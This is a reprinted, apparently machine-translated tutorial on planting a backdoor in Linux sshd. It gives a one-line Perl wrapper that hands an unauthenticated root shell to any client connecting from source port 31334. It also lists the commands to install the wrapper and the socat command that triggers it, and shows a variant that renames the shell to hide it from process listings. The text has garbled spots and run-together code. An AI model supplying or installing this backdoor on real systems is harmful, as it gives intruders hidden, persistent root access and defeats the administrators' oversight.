Short and exquisite SSH backdoors and short and exquisite SSH Backdoors

Short and exquisite SSH backdoors and short and exquisite SSH Backdoors

Sshd backdoor source code:

#!/usr/bin/perlexec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

The meaning of this Code:

In the first line, if the current file handle STDIN is a socket and the remote connection source port of the socket is 31334 (The hexadecimal string in the Big network's byte sequence is \ x00 \ x00zf, exactly match the perl regular .. zf, in the above Code, zf is the Ascii representation of the Big network's byte order), then run/bin/sh, and end the current program running (step 2 is not executed ), it is equivalent to rebounding a root shell (because sshd runs with the root permission) to a remote socket (generally, this row can be triggered only when the attacker specifies the source port for connection)
The second line starts the sshd (/usr/bin/sshd is the real sshd) service, which is passed to/usr/sbin/sshd (backdoor) parameters are passed to the real sshd (this line ensures that common users can also use the ssh service normally, and there is no exception during logon.

How to Use Backdoors

Controlled terminal (Victim) 10.1.100.3 Kali
Control End 10.1.100.2 centos7

1)Perform the following operations on the controlled end:

Move the real sshd to/usr/bin/sshd

mv /usr/sbin/sshd /usr/bin/sshd

 

Move the backdoor sshd (perl script to/usr/sbin/sshd) and grant the execution permission

 chmod +x /usr/sbin/sshd 

 

Restart the ssh service

/etc/init.d/ssh reatart

 

2)Perform the following operations on the control side::

socat STDIO TCP4:10.1.100.3:22,sourceport=31334

 

This line of command means to redirect the input and output as to socket 10.1.100.3: 22 (in this case, STDIN In the backdoor perl script is socket), and the source port of this socket is 31334

This command is equivalent to socat-TCP4: 10.1.100.3: 22, sourceport = 31334

In this way, no authentication is required (because the root shell is rebounded before the sshd authentication stage is reached ).

Connection status of the controlled end Port:

Port 22 is a connection between sh and the control end, and the program name is ssh, rather than a normal sshd. To enhance the privacy, we can copy a copy of/bin/sh, rename it to/bin/sshd and modify the backdoor source code:

#!/usr/bin/perlexec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Control end connection again:

Now it has become sshd, and it is more pseudo-functional!

 

 

 

 

This article Reprinted from Freebuf: http://www.freebuf.com/articles/system/140880.html